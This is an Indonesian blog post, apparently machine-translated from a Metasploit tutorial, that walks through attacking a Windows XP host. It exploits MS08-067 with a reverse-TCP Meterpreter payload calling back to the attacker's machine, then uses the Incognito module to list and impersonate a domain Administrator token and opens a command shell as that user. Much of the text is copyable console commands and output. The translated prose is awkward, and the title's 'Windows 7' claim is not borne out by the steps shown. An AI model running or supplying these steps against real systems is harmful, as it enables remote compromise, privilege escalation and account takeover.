Saturday, 2 February 2013

Exploit windows xp-win 7


Incognito awalnya aplikasi yang berdiri sendiri yang memungkinkan Anda untuk meniru token pengguna ketika berhasil mengorbankan sistem. Hal ini diintegrasikan ke dalam Metasploit dan akhirnya menjadi meterpreter. Anda dapat membaca lebih lanjut tentang Incognito dan bagaimana token yang mencuri karya melalui kertas Jennings Lukas asli.

Dalam nut shell, token hanya seperti cookie web. Mereka adalah kunci sementara yang
memungkinkan Anda untuk mengakses sistem dan jaringan tanpa harus memberikan mandat setiap kali Anda mengakses file. Incognito mengeksploitasi cookie ini dengan cara yang sama mencuri karya, dengan memutar bahwa kunci sementara ketika diminta untuk mengotentikasi. Ada dua jenis token, delegasi, dan berkedok. Delegasi diciptakan untuk 'interaktif' login, seperti masuk ke mesin, atau menghubungkan ke melalui remote desktop. Token berkedok adalah untuk 'non-interaktif' sesi, seperti melampirkan drive jaringan, atau script logon domain. Hal-hal besar lainnya tentang token? Mereka bertahan sampai reboot. Ketika pengguna log off, token delegasi mereka dilaporkan sebagai tanda berkedok, tapi masih akan menampung semua hak token delegasi.
TIP: File server adalah harta karun virtual token karena server file yang paling digunakan sebagai drive jaringan terpasang melalui skrip logon domain

Jadi, setelah Anda memiliki konsol meterpreter, Anda dapat meniru token valid pada sistem dan menjadi pengguna tertentu tanpa harus khawatir tentang mandat atau dalam hal ini bahkan hash. Selama uji penetrasi ini sangat berguna karena fakta bahwa token memiliki kemungkinan memungkinkan lokal dan / atau eskalasi domain hak istimewa, memungkinkan Anda jalan alternatif dengan hak berpotensi tinggi untuk beberapa sistem.

Pertama mari kita memuat mengeksploitasi favorit kami, ms08_067_netapi, dengan payload meterpreter. Perhatikan bahwa kita secara manual menetapkan target karena ini mengeksploitasi tertentu tidak selalu otomatis mendeteksi target dengan benar. Setting ke target yang dikenal akan memastikan alamat memori yang tepat digunakan untuk eksploitasi.


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.211.55.140
RHOST => 10.211.55.140
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.211.55.162
LHOST => 10.211.55.162
msf exploit(ms08_067_netapi) > set LANG english
LANG => english
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name                                               
   --  ----                                               
   0   Automatic Targeting                                
   1   Windows 2000 Universal                             
   2   Windows XP SP0/SP1 Universal                       
   3   Windows XP SP2 English (NX)                        
   4   Windows XP SP3 English (NX)                        
   5   Windows 2003 SP0 Universal                         
   6   Windows 2003 SP1 English (NO NX)                   
   7   Windows 2003 SP1 English (NX)                      
   8   Windows 2003 SP2 English (NO NX)                   
   9   Windows 2003 SP2 English (NX)                      
   10  Windows XP SP2 Arabic (NX)                         
   11  Windows XP SP2 Chinese - Traditional / Taiwan (NX) 


msf exploit(ms08_067_netapi) > set TARGET 8
target => 8
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.211.55.162:4444 -> 10.211.55.140:1028)

meterpreter >


Kami sekarang memiliki konsol meterpreter dari mana kita akan mulai kami menyerang Token penyamaran. Seperti priv (hashdump dan timestomp) dan stdapi (upload, download, dll), penyamaran adalah modul meterpreter. Kami memuat modul ke dalam sesi meterpreter kami dengan menjalankan perintah 'penggunaan penyamaran'. Menerbitkan 'bantuan' perintah menunjukkan kepada kita berbagai pilihan yang kita miliki untuk penyamaran dan deskripsi singkat dari setiap pilihan.


meterpreter > use incognito
Loading extension incognito...success.
meterpreter > help

Incognito Commands
==================

    Command              Description                                             
    -------              -----------                                             
    add_group_user       Attempt to add a user to a global group with all tokens 
    add_localgroup_user  Attempt to add a user to a local group with all tokens  
    add_user             Attempt to add a user with all tokens                   
    impersonate_token    Impersonate specified token                             
    list_tokens          List tokens available under current user context        
    snarf_hashes         Snarf challenge/response hashes for every token         

meterpreter >


Apa yang kita perlu lakukan pertama adalah mengidentifikasi apakah ada bukti yang valid pada sistem ini. Tergantung pada tingkat akses yang mengeksploitasi Anda memberikan Anda terbatas dalam token Anda dapat melihat. Ketika datang ke token yang mencuri, SISTEM adalah raja. Sebagai SYSTEM Anda diijinkan untuk melihat dan menggunakan token kotak.
TIP: Administrator tidak memiliki akses ke semua token baik, tetapi mereka memiliki kemampuan untuk bermigrasi ke proses SISTEM, efektif membuat mereka SISTEM dan mampu melihat semua yang tersedia token.


meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter >


Kita lihat di sini bahwa ada token Administrator valid yang terlihat menjadi kepentingan. Kita sekarang perlu untuk meniru token ini dalam rangka untuk menganggap hak-hak istimewanya. Ketika menerbitkan 'impersonate_token' perintah, perhatikan dua backslashes dalam "Administrator SNEAKS.IN \ \". Hal ini diperlukan karena menyebabkan bug hanya dengan satu garis miring. Perhatikan juga bahwa setelah berhasil menyamar sebagai token, kami memeriksa UserID kita saat ini dengan menjalankan 'getuid' perintah.


meterpreter > impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
Server username: SNEAKS.IN\Administrator
meterpreter >


Selanjutnya, mari kita menjalankan shell seperti ini account individu dengan menjalankan 'mengeksekusi-f cmd.exe-i-t' dari dalam meterpreter. Eksekusi-f cmd.exe memberitahu Metasploit untuk mengeksekusi cmd.exe, the-i memungkinkan kita untuk berinteraksi dengan PC korban, dan-t mengasumsikan peran kita hanya menyamar melalui penyamaran.



meterpreter > shell
Process 2804 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> whoami
whoami
SNEAKS.IN\administrator

C:\WINDOWS\system32>